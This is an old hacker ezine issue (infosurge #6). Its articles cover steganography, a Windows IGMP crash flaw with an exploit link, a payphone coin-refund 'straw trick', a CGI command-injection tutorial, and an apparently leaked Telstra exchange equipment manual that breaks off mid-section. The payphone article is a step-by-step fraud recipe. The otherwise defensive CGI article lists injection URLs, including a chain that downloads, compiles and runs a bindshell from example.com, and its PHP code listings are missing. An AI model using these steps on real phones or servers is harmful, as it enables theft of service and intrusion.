webfig

.__________ ________ |_ ___ | (________)__ ______. |___|_____ | | ! | |__ | | info | __ | | __ | | surge | | | ___| | | | | | | | | l________j____j |____j_________l |____j _____._____ ____ __ ___________ __ _________. | | | | ! | ! | __ | | __|__ | | ______| __ | ______| l__ | ! | | | | | | | | | | | | | | | l________j_______l____j_|_______ |_________j | j | l____________j asKi by k. .------------- ----------------. : Official Web Site -> http://infosurge.rendrag.net : : Official Submissions -> phase5@cmdrkeen.net : : Official Author of the Month -> Dr. Seuss : : : : issue #6: 26/07/2000 : .__________________________________________________________. "decreasing the global cluefactor by 0.69%" ............................[ Table Of Contents ]........................... [Intro ............................................................... phase5] [Editorial ........................................................... phase5] [Basic Steganography ................................................ ^jestar] [Nokia SimClocks .................................................. assasss|n] [IGMP Flaw in Windows ................................................. lymco] [Straw Trick v2 ....................................................... gruf|] [CGI Security .......................................................... fyre] [ICM v2 Docs .................................................... MarlinSpike] [A look into wiretapping ............................................. psyops] [Ericsson GH337 ...................................................... Pottsy] [Outro .............................................................. phase5] [Total ................................................... infosurge (79.2kb)] .................................[ shouts ]................................. [ shard ^jestar lymco eckz damien bsdave fyre heihachi xm k beatz stormie ] [ assass|n synister cmdrkeen phunki ghengis head_rush tux x-circuit make\\ ] [ alpha karag aphex Wewted cyberpuppet fed0 ] ........[ Editorial ].................................[ phase5 ]............ Back again with issue 6. for some reason, I received some complaints about issue 5. 'lack of content' was the most common complaint. strangely, those complaining about the < 3kb size were the same who had contributed 0kb. I'd just like to thank them all for their support. It was their tireless work that made is5 what it was. On a related note, we desperately need articles, but thats nothing new. While I'm here, I would like to thank those who have supported us, especially Damien for providing hosting and #phreak and #infosurge. ........[ Basic Steganography ].......................[ ^jestar ]............ > Intro Steganography is the art of hiding information in such a way so that it is unnoticable to the naked eye (or ear, or any manner of senses depending on what container you use). The basic concept of this is as follows. Imagine you are James Bond (you know you want to) and you need to get a message back to M from the field without being detected (because being killed would be kind of detrimental to your living status), now I guess you are thinking to yourself "easy, i'll encrypt my message and send it in via email" (this being the age of the internet and all) but shock horror your email is intercepted by the evil super villian of the day, and this being the movies your message was decyrpted in 10 seconds using a flashy computer system and you were found and *retired*. As you can see, encrypting messages you want to keep secret is only as effective as the encryption method and strength you use. Now lets go through that scenario using steganography instead of normal encryption methods. You work out your message and using steganography techniques you embed your message into a jpg image of you (bond, james bond) on holiday in Hawaii with your mother. You then email this back to M. The email is intercepted (pesky evil super villains) but all they see is holiday snaps of you and your mother, think nothing of it and send it on through. Your message gets through to M, who has been told in advance that any messages that you send would come through in that photo, and uses techniques to remove to stego payload from the image, leaving the message to get through unhindered. Now thats a kinda odd description but it seems to point out pretty well what some of the benefits of steganography are. The power of it is that people cant read what they don't know is there. > Common containers Im not sure if its the actual technical term for the media in which you want to store the stego payload, but I call it the container. This makes sense to me because it will be *holding* the payload, and containers hold stuff (makes sense right?). Anyway, a stego container can be almost anything you can imagine, from the fairly obvious to the completely abstract. The following are some fairly obvious containers for a stego payload: - Text - Images - Audio There are also some containers which are completely abstract, you wouldnt even suspect that they might contain a hidden message. A quick scan around my room revealed these as the most abstract containers I could see: - A deck of cards (order of cards could be a message) - A cassette tape I've also heard of some pretty ingenious methods being used for containers like manipulating the headers of tcp/ip packets, as you can see, I wasnt joking when I said basically anything could be a container. If you decide to use something that you think is fairly cool and isnt something people would think of straight away I would be interested in hearing about it (jestar@rendrag.net or ^jestar/#phreak@austnet.org). Now onto the juicy stuff. > Getting the message across The technique for hiding the message will obviously different depending on the container that you decide to use, and I will cover a few of the simpler methods in this article (it is a *basic* stego article after all) the theory covered for the basics will most likely be easily applied to what ever container you end up using. >> text There are a number of ways that you can embed a message in text but the easiest way is probably through character substitution. Im not sure if thats the right word (again) but what I mean is this. You would take a normal sentence and hide the message in it, or more likely you would build a convincing sentence (or story) around your message. Here's a simple example: Ok, the message is 'i am sam, sam i am' and here is the stego carrier, a paragraph of plain text 'In Adelaide mall Sunday after morning, Sally ate maccas in Alans monaro' You can probably see how that one worked, the first letter of each word is a letter of the payload. Now, that was pretty obvious, and if its obvious then it ISNT effective stego. In fact, I reckon my cat could spot that payload. Also, the container paragraph sounds kinda stilted, you can tell theres something not quite right with it because you had no choice in what letter the word would start with. I would suggest using something like the first letter of a sentence is a letter of the payload, which would make for a much more free flowing container, but on the downside a much longer container. You can use pretty much any character manipulations you want, as long as the person on the receiving end knows exactly what you are using, after all, if you make it really good they are gonna have to know how to get the payload out. >> images Storing the stego payload in images is far more interesting, and if you get into steganography this is what you will probably mostly be using. The idea is to work out what the least significant bits in the image file are (ie, the ones that *wont* affect the actual output of the image, or will only affect it slightly) You then replace these bits with the bits of your message. Of course, the amount of payload you can fit will differ depending on what picture you use, what colour depth the image is, what format the image is stored in and a number of other factors. You also need some way of recording which bits you have modified so that you can later remove the payload. The end result of good image steganography is an identical image with and without the payload. The end result of bad image steganography can range from discoloured images to strange warping of the image, to any number of other odd effects (noise, blur etc). > Would you like extra paranoia with that order? If you are really stressed out about the message being intercepted (and lets face it, if your using steganography then you are) then you will probably want the extra layer of defence that encrypting the payload would give, and theres no reason you shouldnt encrypt the payload before putting it into the container but remember that an encrypted message ends up being much larger than a non encrypted message (generally anyway) so you will either need a bigger container, or to split up the message into multiple containers (which may be required for larger payloads anyway). All something to think about. > Closing I hope you have found this very basic introduction to steganography interesting, and perhaps it will motivate you to find out more. There are many stego tools available at www.securityfocus.com if you are interested in giving some of them a try, for a variety of containers. jestar ........[ Nokia SimClocks ]..........................[ assass|n ]............ I would like to clear up a bit of confusion out there in the phreaking community in regards to the stopping of the sim-card (Sim Clock) on a nokia 5110 : NSE-1. The *#746025625# (*#sim0clock#) is a feature which is supposed to be a power saving feature which saves power by removing the charge from the sim-clock. When *#746025625# is entered into most nokia mobile phone it displays "Sim Clock Stop Allowed" or "Sim Clock Stop Not Allowed", but if you view the proper nokia technical documentation about Field Test Display it states some interesting information. Section 3.5: Memory Handling - 3.5.1 Display 51: SIM information --> shows the display for the test function 51 which is as follows; ++++++++++++++ Example display: ++++++++++++++ +aaa bbb ccc + MY Phone +3 372 YES + + dddddddd + +DOWN(UP) + + f g hh ii + + 3 X 10 XX + + j kkkk + + 0 0000 + ++++++++++++++ ++++++++++++++ aaa Sim voltage selection type (5, 3 or 3/5) bbb Sim baudrate (372, 64, 32 or 0) ccc Clock stop allowed, Yes or No dddd Clock stop condition, Up or down (PREFFERED) eee Clock stopped, Yes or No (NOT IMPLEMENTED) f pin1 attempts left (0,1,2,3) g pin2 attempts left (0,1,2,3) hh puk1 attempts left (0-10) ii puk2 attempts left (0-10) j ATR retransmission counter (0-9) kkkk Transmission frame/parity errors, FE/PE + hexadecimal count That clearly states that the option of stopping the sim clock was not implemented, but it does show the Sim Clock stop allowed feature, which on my phone is enabled. Therefore I have come to the conclusion that the ability to stop a Sim Clock is non-existant as the feature isn't on the display, meaning that you can find out the an ability which cannot actually be carried out. So for all those people out there who tell me that they can get free calls by stopping the sim clock, simply explain how you are doing such a thing, cause I kinda aint buyin it :). If you would like more information about what you have read or about the Nokia Field Test Display contact me through assassin@datasurge.net ........[ IGMP Flaw in Windows ].......................[ lymco ]............ This is a quick article to explain the glitch in the TCP/IP stack for Windows 9*, and NT 4.0. It may be approaching old school, however few people actually know about the problem, yet alone understand it.. . what's the problem? Sending fragmented IGMP packets to a Windows box can cause the operating system to lose performance and/or crash. IGMP (Internet Group Management Protocol) is a protocol in the TCP/IP suite, and is used for IP multicasting, where data sent to a single IP can reach multiple hosts. . prevention Microsoft have released patches at the following addresses: Windows95: http://www.microsoft.com/windows95/downloads/contents/WUCritical/vip386/Default.asp Windows98: http://www.microsoft.com/windows98/downloads/contents/WUCritical/VIP386/Default1.asp Windows NT 4.0: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/ . the exploit A re-write of the original exploit can be found at: dev.spanner.net/scripts/pimp.c Use it for securing boxes, not for running amok and DoS'ing random Windows users. (Disregard previous line, fed0). . conclusion This is an example of another Windows TCP/IP vulnerability. Instead of adding on more garbage to Windows each version, Microsoft should perhaps redo it from scratch. There is a chance they could get it right, after all, they are on the right track. Windows actually reminds me of hotdogs, alot of crap gets thrown together to form it, yet it can still be satisfying. If you have any comments/questions or hate mail, please direct it to lymco@spanner.net. -- lymco dev.spanner.net ........[ Straw Trick v2 ].............................[ gruf| ]............ Aha, payphones! Now, we have all heard of the entertaining things that it was possible to do with a $2 coin, a straw & a telstra payphone. Unfortunately, telstra heard of this as well, & (un)promptly spent several million fixing their little problem. And now there's another one. -------------------- The Principle. Apart from the fucking obvious one of free fone-calls... This seems to work only if you use one coin, that is worth more than a local call. (eg, 50c). If you use, say, a 20c coin the call only lasts for approx 20 seconds, and that is not the aim of the exercise :) -------------------- Well what is it then? Basically it goes like this. Get your trusty ald macca's straw out. And jettison it, get a thinner one. (Something like a normal straw from any servo or cafe) - Begin as you would if you were making a call & actually paying for it. ie, handset up, money in, start to dial. - Stop dialing, do not finish dialing, (do not let the phone connect). - Hold the flap covering the coin-return-bay CLOSED. - Utilising your trusty new straw (im my case conveniently located inside an old coke can beside the fone), slide the straw into the phone above and in the middle of the flap you are holding closed. - When the straw bottoms out (going upwards) violently smack the straw from side-to-side a few times. - Clink, goes your refunded coin. - $$ credit stays in fone. & your off like old fish. grufl@yahoo.com ........[ CGI Security ].................................[ fyre ]............ Basic CGI Security Fyre INTRODUCTION ------------ A few weeks ago, a friend of mine decided to write a web interface to the FIGlet program (http://st-www.cs.uiuc.edu/~chai/figlet.html for details). His naive implementation of the interface may have looked similar to the following PHP code: -- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- webfig

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- Throughout this article I've used PHP to illustrate my points since it's easier on the eyes, simpler to understand and seems to be quite popular recently, instead of a language like C, perl, python, tcl, pike, etc. Most languages will have the equivalent of a system() function with the same flaws as PHP's so this discussion is just as relevant to any language. If you have a working Apache+PHP3 setup, enter the code for webfig.php3 from this article and follow the examples, it's much easier to illustrate how dangerous it is. Take care that the webfig.php3 can't be access by anyone else and remove it when you've finished with it just in case. That script works (try it if you dare), the URL http://localhost/~fyre/webfig.php3?text=hi in a web browser produces this output: _ _ | |__ (_) | '_ \\| | | | | | | |_| |_|_| (figlet 'hi' produces the same output) PROBLEM ------- Some people may stop there and sadly a lot of people do. However, the system() function in PHP, the popen() and exec() functions and the backtick operator (`) uses the shell to execute the command. Most other languages have equivalent functions. Although my examples use PHP's system() function, the points I discuss are relevant to any function in any programming language that uses the shell to execute commands. The SYSTEM(3) manpage, which documents the C system() function upon which the PHP function is based has this to say: system() executes a command specified in string by calling /bin/sh -c string and returns after the command has completed. The entry for system() in the PHP manual says this: Note, that if you are going to allow data coming from user input to be passed to this function, then you should be using the EscapeShellCmd() function to make sure that users cannot trick the system into executing arbitrary commands. This warning is often overlooked by inexperienced PHP programmers or people who have to get a job done in a hurry. The way a user's input can "trick" the system into executing arbitrary commands is by having embedded shell metacharacters. These characters have a special meaning to the shell, from separating a list of commands to redirecting the output of a program somewhere, and must be "quoted" or "escaped" if this special meaning is not desired. As I had expected, his script did not escape the shell metacharacters as the manual suggested. I tried something similar to this URL in my trusty Internet Explorer*: http://localhost/~fyre/webfig.php3?text=hi;ls - this is the somewhat scary output: _ _ | |__ (_) | '_ \\| | | | | | | |_| |_|_| webfig.php3 very_secret_data Yeek! The system() call here would have executed /bin/sh -c 'figlet hi;ls'. As you should have picked up, the ; character separates commands. The script has been "tricked" into executing both figlet and ls instead of only figlet. The fun doesn't stop there. Just about every other shell metacharacter can be used to cause unexpected results and can pose a security risk. A few of the most useful ones (to the person trying to break in to your site) are: ; (semicolon) - Discussed above. Semicolons separate commands to be sequentially executed by the shell. Incredibly easy to use to breach security. (http://localhost/~fyre/webfig.php3?text=hi;ls) | (vertical bar) - Pipes; output of preceeding program is the input of the proceeding program. (http://localhost/~fyre/webfig.php3?text=hi|ls) &&, || (double-ampersand, double-bar) - These tell the shell to execute the following command (similar to semicolon) depending on the exit status of the previous command. double-ampersand executes the next command if and only if the previous command's exit status was 0 (success). double-bar executes the next command if and only if the previous command's exit status was nonzero (failure). (http://localhost/~fyre/webfig.php3?text=hi&&ls) & (ampersand) - Executes the preceeding command in the background and also separates commands. (http://localhost/~fyre/webfig.php3?text=hi&ls) < > >> (triangle brackets) - Input and output redirection operators - these can be used to read the contents of other files or to write to files. (http://localhost/~fyre/webfig.php3?text=important_data) `, $() (backticks, dollar-bracket) - Evaluates the shell commands between the backticks (`command`) or dollar-brackets ($(ls)). (http://localhost/~fyre/webfig.php3?text=hi`ls`) newline - Newlines separate commands just like semicolons, although they're a little bit harder to get into a URL - The urlencoded form is %0A (see the note below). (http://localhost/~fyre/webfig.php3?text=hi%0Als) $ (dollar) - Can be used to get the value of an environment variable. (http://localhost/~fyre/webfig.php3?text=$OSTYPE) ~ (tilde) - A single tilde is replaced with the current user's home directory (for example, ~ expands to /home/fyre). If the tilde is followed by a username, that user's home directory is used (for example, ~root expands to /root). However, if the username following a tilde is not present on the system, it is left alone (for example, if there is no account 'fred' on this system, ~fred stays as ~fred). This can be used to determine whether a user has an account on the system. *, ? (star, question mark) - Wildcards. These can be used to get a listing of files in a directory matching a certain pattern. A single * may be used to list all files in the current directory as usual, or you may prefix it with a directory name, eg. /etc/*. (http://localhost/~fyre/webfig.php3?text=*) Another character to watch out for is NUL (%00), which is used by C and the system as an end-of-string marker. For example, http://localhost/~fyre/webfig.php3?text=hi%00moo will only output "hi" since the system thinks the string ends at the NUL character and ignores the rest. Rain Forest Puppy's article in Phrack 55 has a nice discussion of the effect of NUL characters in the perl language. In summary, the W3C recoomends escaping these characters: &;`'\\"|*?~<>^()[]{}$\\n\\r Note that not all characters are valid in URL's, and some are processed specially by the webserver (ampersands, for example) - you must 'urlencode' these characters by replacing them with a percent sign ('%') followed by the two digit hexadecimal representation of their ASCII code. For example, %0A is ASCII 0A hex, 10 decimal, newline. If that sounds too much like hard work, this little C program may help: -- 8< -- 8< -- 8< -- urlencode.c -- 8< -- 8< -- 8< -- #include int main () { int c; while ((c = getchar()) != EOF) printf ("%%%02x", c); putchar ('\\n'); return 0; } -- 8< -- 8< -- 8< -- urlencode.c -- 8< -- 8< -- 8< -- It urlencodes its standard input and writes it to standard output. You might use it like this: $ echo -n 'hi;ls' | urlencode %68%69%3b%6c%73 ... but that's not very relevant, we're writing secure scripts here not taking advantage of other programmers' mistakes, right? ;> Listing files is the tip of the iceberg. Have a look at this example (%20 is the space character): http://localhost/~fyre/webfig.php3?text=hi;wget%20http://www.example.com/bindshe ll.c http://localhost/~fyre/webfig.php3?text=hi;cc%20bindshell.c%20-o%20bindshell http://localhost/~fyre/webfig.php3?text=hi;./bindshell There the malicious evil d00d has downloaded a 'bindshell' (a program that usually listens on a TCP port and drops anyone connecting to that port into a shell, bypassing the normal login sequence. It does not usually show up in logs, either), then compiled it with cc, the C compiler, and finally executed it. They now have the privileges of the user CGI scripts are run as, which will depend on your configuration. Now that they have access to a shell, there are far more vulnerabilities they can try to use to gain superuser access. SOLUTION -------- Hopefully that has scared you into writing code that avoids all the problems associated with shell metacharacters. Luckily for you, PHP's escapeshellcmd() function comes to the rescue! Its purpose is to "escape shell metacharacters", it prefixes them with a backslash (\\) so the shell does not treat them specially. For example, the string "hi;ls" would be converted to "hi\\;ls". A more secure version of webfig.php3: -- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- webfig

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- This time we use escapeshellcmd() to stop malicious people "tricking" the shell into doing things it shouldn't before using their input. When we try the earlier example of http://localhost/~fyre/webfig.php3?text=hi;ls we get the following (better) output: _ _ _ | |__ (_)_| |___ | '_ \\| (_) / __| | | | | |_| \\__ \\ |_| |_|_( )_|___/ |/ That is much better, and none of the previously mentioned metacharacters cause any adverse effects when used in the 'text' parameter. I'm still a little bit scared of the system() function since it may not understand every metacharacter your shell does. If you're paranoid, you could escape _every_ character with a backslash (\\). "hi;ls" becomes "\\h\\i\\;\\l\\s". As you can see, this makes the string unreadable and doubles the storage required to hold it. As you might have realised, there is still at least one more problem with our improved webfig.php3. Remembering that UNIX interprets command line arguments beginning with a '-' as an option. We can specify command line options to the figlet program by embedding them in the 'text' variable! For example, http://localhost/~fyre/webfig.php3?text=-f%20small%20hi is executed as "figlet -f small hi", which uses a different font via the -f option. The figlet program doesn't seem to have any dangerous command line arguments, except perhaps the -f, -d and -C options which read from files. They seem to be quite picky about their input, however, and I haven't been able to make them display arbitrary files. As a special case, if '--' is encountered then option processing is terminated. When invoked as "figlet -- -f small hi", the '-f' is not treated as a command line argument, instead it is treated as normal text. See the GETOPT(3) manpage for specific details on how options are processed in most (not all) programs. The following version of webfig.php3 is a little more secure: -- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- webfig

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- It is left as an exercise to the reader to find additional security holes in the above version of webfig.php3 :) CONCLUSION ---------- I've touched on just one of the many important security problems faced by any programs running at a privilege level above that of the user causing the commands to execute. CGI scripts have this problem have this problem since the user should not be able to cause execution of arbitrary commands on a webserver. setuid and setgid programs on UNIX systems have this problem (along with a bunch of other problems) - they run as a privileged user (setuid root programs pose the most danger, although setgid tty and setgid mail are almost as bad). In conclusion, I reccomend you avoid system() and the other similar functions in whatever language you choose like the plague unless you're absolutely sure you've done it properly. That's all from me... *Internet Explorer: Don't start this flamewar with me. Show me a better browser and I'll try it. ........[ ICM v2 Docs ]...........................[ MarlinSpike ]............ ICM V2 - EXCHANGE END USERS MANUAL Here is a manual I recently 'aquired' about the ICM and related systems in use in our exchanges. This is an exact transcript of the manual, word for word, line for line. This is the second version of the system, so I imagine the third version is in use in some exchanges around Australia, but this system may be in use in your local exchange. At the very least, it gives you an example of the kind of equipment used in exchanges and can familiarise you with this type of equipment. It will also help you learn alot of the jargon and procedures used by Telstra and it is a piece of whatever puzzle it is you may be trying to solve. Anyway, if you ever get access to this system, it wouldn't do for you to not be able to utilise it, now would it? CONTENTS 1. INTRODUCTION 1.1 THE CONCEPT OF INDIVIDUAL CIRCUIT MONITORING 1.1.1 General 1.1.2 Circuit Performance Management 1.1.3 Fault Detection 1.1.4 Limitations 1.2 THE ICM SYSTEM HARDWARE STRUCTURE 1.2.1 General 1.2.2 Central Computer System 1.2.3 Exchange-based Equipment 1.3 CENTRAL COMPUTER FUNCTIONS 1.3.1 Establishing Communications 1.3.2 Time Syncronisation 1.3.3 Configurations and Passwords 1.3.4 Remote Usage/Pegcount Polling 1.3.5 Poll Reports 2. PRINTER/TERMINAL 2.1 GENERAL 2.1.1 On Line Indication 2.1.2 Enabling/Disabling Printouts 2.2 CONFIGURING 2.2.1 Configuration Table 2.2.2 References 3. CONTROLLER AND COMMUNICATIONS INTERFACE (CCI) 3.1 GENERAL 3.1.1 Power Up 3.1.2 Diagnostics 3.2 FRONT PANEL 3.2.1 Idle LED Pattern 3.2.2 Modem LEDs 3.2.3 Printer/Terminal Port 3.2.4 GPIB Ports 3.2.5 Push Buttons 3.3 ERROR DIAGNOSTICS 3.3.1 GPIB Monitoring 3.4 LINE TESTING 4. INDIVIDUAL CIRCUIT MONITORING MODULES 4.1 GENERAL 4.2 INSTALLATION 4.2.1 Power Up 4.2.2 Replacement 4.2.3 Precautions 5. SYSTEM OPERATION 5.1 LOCAL FUNCTIONS FROM PRINTER/TERMINAL 5.1.1 General 5.2 IDLE MODE COMMANDS 5.2.1 Listing Configurations 5.2.2 ICMM Status Request 5.2.3 Central Computer Link Status 5.2.4 Central Computer Link Statistics 5.2.5 Dynamic Memory Status 5.2.6 Time Request 5.2.7 Poll Status 5.2.8 Request Group Report 5.2.10 Request Transaction Report 5.2.11 Help 5.3 SPECIAL MODE COMMANDS 5.3.1 Local Poll Mode 5.3.1.1 Polling an ICMM 5.3.1.2 Polling a Group 5.3.1.3 Swapping Registers 5.3.1.4 Exiting Local Poll 5.3.2 Transactions Mode 5.3.2.1 General 5.3.2.2 Content of Transactions 5.3.2.3 Create/Modify a Group 5.3.2.4 Delete a Group 5.3.2.5 Create a Line 5.3.2.6 Modify a Line 5.3.2.7 Delete an Exchange 5.3.2.8 Edit Transactions 5.3.3 Remote Terminal Mode 5.3.4 Message Mode 5.3.4.1 General 5.3.4.2 Editing Messages 5.3.5 ICMM Test Mode 5.3.6 Communications Mode 5.4 EXITING MODES 6. DATABASE MANAGEMENT 6.1 GENERAL POLICY 6.2 NEW INSTALLATIONS 6.3 AMENDING EXISTING DATABASES 6.4 CODING OF DATA FOR ICM 7. ICM REPORTS 7.1 GENERAL 7.2 REPORT TYPES 7.2.1 Detailed 7.2.2 Exception 7.2.3 Group Summary 7.2.4 Crossed Leads 8. HARDWARE MAINTENANCE AND ROUTINE CHECKS 8.1 GENERAL 8.2 PROVEN FAULTY EQUIPMENT 8.2.1 ICMM 8.2.2 CCI 8.2.3 Printer 8.3 ALARMS 8.4 ROUTINE CHECKS 8.4.1 CCI 8.4.2 ICMM 8.4.3 PRINTER 9. FAULT FINDING 9.1 GENERAL 9.2 FAULT TYPES 9.2.1 Always Idle (AI) 9.2.2 Always Busy 9.2.3 High Pegcount, Low Holding 9.2.4 Low Pegcount, High Holding 9.2.5 Low Pegcount, Normal Holding 9.2.6 High Pegcount, Normal Holding APPENDICES APPENDIX A: Coding of Input Data APPENDIX B: Hexadecimal to Decimal Conversions 1. INTRODUCTION 1.1 THE CONCEPT OF INDIVIDUAL CIRCUIT MONITORING 1.1.1 General The concept of ICM is based in the fact that all lines in a route should, over a sufficiently large sample exhibit similar average hold times. Lines which are never seized, permanently seized, or have hold times significantly different from the average for the route are presumed worthy of investigation and may possibly be faulty. 1.1.2 Circuit Performance Measurement The ICM System monitors Exchange plant by detecting "events" and "event states". An "event" is defined as a transition from the inactive or idle state to an active or busy state and vice-versa. An "event state" is the idle or busy state. The circuits to which ICM test leads are connected are referred to as "lines". From this event detection the ICM system collects the following attributes for each line :- - Pegcount : The number of times a line is seized in a given period. This is simply the number of "events". - Usage : The accumulated time the line spent in it's event state during the same period. The ICM system accumulates these attributes over a time period known as a 'Poll' period. At the completion of a Poll period the data is collected by the Central computer and various reports are generated which highlight suspect lines. 1.1.3 Fault Detection The ICM system compares this data with minimum and maximum expectation 'thresholds' and then produces reports on any circuit behaviour variations in a group/route. These 'thresholds' are not specified line-by-line but on a group of lines by the ICM operator. Typical thresholds are listed below. They can vary from group to group, day to day, hour to hour. In fact there is a lot of "fine-tuning" necessary to reduce the number [of] non-faulty circuits reported on. LP (Low Pegcount) Less than 1 an hour HP (High Pegcount) More than 50 an hour LH (Low Holding) Less than 30 secs a call HH (High Holding) More than 3550 secs a call LU (Low Usage) Less than 50 secs an hour HU (High Usage) More than 3550 secs an hour AI (Always Idle) Never seized AB (Always Busy) Permanently seized A high Pegcount with a low Average Hold-time are likely symptoms of a line dropping out before the call is completed. Conversely high Average Hold-time and low Pegcount may indicate that a circuit is being held for an undue length of time. 1.1.4 Limitations The system only identifies "probable faults" and it is possible for lines to be deemed faulty when in fact they are not. For example, very high usage figures approaching 3600 seconds in a one hour period may indicate a call that is not releasing properly. It may also indicate a valid call of an unusual duration. Similarly, very low or 0 usage figures in a period may indicate a cct that is not being seized or a period of little or no traffic. [cct = circuit?] 1.2 THE ICM SYSTEM HARDWARE STRUCTURE 1.2.1 General The ICM System hardware consists of equipment at both the Central site and a number of Exchanges. 1.2.2 The Central site consists of the following items :- - WICAT 200 computer on which the main ICM system software runs under a WMCS operating system. - A hard disc (84mb). - A 9 track Winchester magnetic tape unit. - 2 VDUs for system control and data maintenance. - A hi-speed printer. - Front End Processors through which the computer communicates with the exchanges via modems. 1.2.3 Exchange-based Equipment The Exchange equipment consists of the following :- - Individual Circuit Monitoring Modules (ICMM). An ICMM can monitor 256 lines. The Exchange ICM can be expanded in increments of 256. - ICM Terminal unit frame. A frame can hold up to 14 ICMMs. There is one frame per ICMM rack. - Controller and Communications Interface (CCI). The CCI collects the data from the ICMMs and transmits it to the Central computer over leased modem links. - The CCI also provides an interface for the ICM printer/terminal. Some control functions can be performed by local Exchange staff. The CCI front panel and the printer/terminal provide limited status and diagnostics. 1.3 CENTRAL COMPUTER FUNCTIONS 1.3.1 Establishing Communications The link between the CCI and the Central site is under the control of an error correcting protocol. Whenever the CCI is powered-up it attempts to talk with the Central computer. When 'end-to-end comms' have been established, the CCI prints out a message:- COMMS ON LINE When the CCI cannot communicate with the Central Computer, a message is printed:- COMMS LINE BREAK If there has been a shut-down and re-boot of the Central site then the message is:- CENTRAL SITE POWER UP 1.3.2 Time Synchronisation The CCI contains a battery operated clock which is set by the Central computer when the CCI powers-up and at each Poll request. 1.3.3 Configurations and Passwords When a CCI powers up a command is sent to the Central computer asking for the Configuration and Group Definitions to be downloaded. These are then stored in the CCI memory. New configurations are automatically sent whenever the database is updated. The CCI will print out a message to this effect. Local staff can list them with the L command. The CCI requires Group Definitions/Configurations so that it knows the ICMM and inlet for each line in each group. This information is used for both local and remote polling. 1.3.4 Remote Usage/Pegcount Polling The CCI and Central computer remote polling works unseen to local staff except for the reports sent to CCI and printer. For interested local staff a brief description will be given. Remote polling begins with the creation of a POLL/REPORT SCHEDULE by the Central Computer operator. This schedule contains the groups of lines to be polled, the poll times and the reports required. When polling starts a command is sent to the CCI telling it which lines to poll next. The CCI maps these groups of lines to GPIB/ICMM addresses using the Group Definitions stored in memory. When a Poll command is recieved from the Central computer the CCI sends commands to relevant ICMMs to swap their idle and active registers. After the swap the Central computer can ask the CCI for the pegcount and usage data. The CCI asks each ICMM for this data and transmits it to the Central site. The Central computer tells the CCI which groups of lines to poll next and the time to poll them. 1.3.5 Poll Reports Depending on the Poll/Report Schedule reports are sent to the exchange concerned. These reports are printed if the CCI is in the Idle mode. If, however, the CCI has been placed into another operating mode a message will be printed out and the user has 30 seconds to exit out of the mode. Should the user decide not to exit the CCI will over-ride and print the report before returning to the user-selected mode. 2. PRINTER/TERMINAL 2.1 GENERAL The CCI prints Local and Central Computer reports and messages on the printer/terminal and interprets and executes commands entered from the key-board. The printer/terminal is a Digital LA-100 type, and may be located remotely from the ICM rack provided the length of the cable does not exceed 20 metres. The printer/terminal will be installed and configured by the ICM Installation group. Should the LA-100 develop a fault it may require re-configuring for ICM format. Ref 2.2. 2.1.1 On Line Indication If the printer is correctly configured and the CCI recognises it then the following lamps glow :- CTS, LINE, DSR and POWER 2.1.2 Enabling/Disabling Printouts A printout can be suspended with the keys :- CTRL+S This command sends a 'XOFF' to the CCI which is recognised as a command to suspend printing. The 'BLOCKED' lamps on the CCI will glow. The CCI can be instructed to restart printing with the keys: CTRL+Q A 'XON' character is sent to the CCI and printing recommences. The 'ON LINE' on the CCI will glow. Never leave the printer unattended in the BLOCKED condition. The only time the CTRL+S and CTRL+Q keys should be used is if the printer runs out of paper or the paper jams. 2.2 CONFIGURING 2.2.1 Configuration Table To check the current configuration of the LA-100 - Press LOCAL key. - Press CTRL+SETUP keys together. - Press STATUS key. The current configuration table will be printed and must be as listed below for ICM operation. LA100 V1.3 KSR 0.4K Buffer DPSs: 006. ............... ***Keyboard Settings : E-Local echo:Disabled K-Keyboard:United States L-Return Key: Q-Keyclick:Disabled U-Break Key:enabled Y-Keypad mode:numeric ***Printer Settings : B-Pitch Mode:All pitches C-G0 Character set:United States D-G1 Character set:United States G2 Character set:United States G3 Character set:United States F-Form Length:264 H-Horizontal pitch (cpi):10 J-End of line control:wrap mode V-Vertical pitch (lpi):6 W-NewLine request char:none ***Communications Settings : A-Auto-answerback:Disabled N-Disconnect on EOT:Disabled O-Paper fault on processing:XOFF (if enabled) P-Parity:7/E R-Reciever error:Print block error S-Speed:1200 X-Auto XON/XOFF:Enabled Z-Modem control:No Modem Control-Restraint Any departure from these settings must be corrected. Refer:- LETTER WRITER 100 GUIDE Chapter 3. After storing any new configurations exit SETUP and return the printer to the ON LINE condition. 3. CONTROLLER AND COMMUNICATIONS INTERFACE (CCI) 3.1 GENERAL The CCI provides a general interface between the ICM computer and the Exchange ICM equipment. The CCI gives the Central computer the ability to collect the data gathered by the ICMMs and to send reports back to the CCI. The CCI also provides various functions to the local Exchange staff. By entering commands at the printer/terminal or by selecting lines from the front panel, local staff can also interrogate, monitor and test circuits. 3.1.1 Power Up When the CCI is powered up or a break occurs in the power supply a message is printed out to that effect which the date, time and amount of memory available. The CCI is very susceptible to noise and breaks on the power supply. For example, starting and running emergency power supplies. If the CCI powers down and then up again all data collected previously is lost. This should be kept in mind as it is the usual reason for loss of reports or reports which state that all poll data is missing. 3.1.2 Diagnostics Should an error occur during power up the error condition will be displayed on the two 7 segment LEDs on the front panel of the CCI. 7 segment display Meaning r0 ROM Checksum fault r1 RAM1 Fault r2 RAM2 Fault rF 64K RAM Fault If no errors are detected then the letters 'PF' are displayed and the internal audible alarm is activated. To reset the alarm press the 'LAMPS/BUZZER' key. The LED display should now be slowly rotating. 3.2 FRONT PANEL 3.2.1 Idle LED Pattern Slowly rotating indicates processor is running. 3.2.2 Modem LEDs The following LEDs are alight if the modem is correctly connected and functioning :- DTR, RTS, CD, DSR and CTR 3.2.3 Printer/Terminal Port Refer to 2.2 for configuration of the printer. If the printer is correctly configured and connected then the 'PRINTER ON-LINE' LED should glow. 3.2.4 GPIB Ports When everything is running normally the 'POLLING' LED for the GPIB should be flickering to indicate data transfer between CCI and the ICMMs. Should a GPIB 'FAULT' LED glow, refer to 3.3.1 3.2.5 Push Buttons - Select GPIB. Refer 3.3.1 - Select ICMM. " 3.3.1 - Select Line. " 3.3.1 and 3.4 - 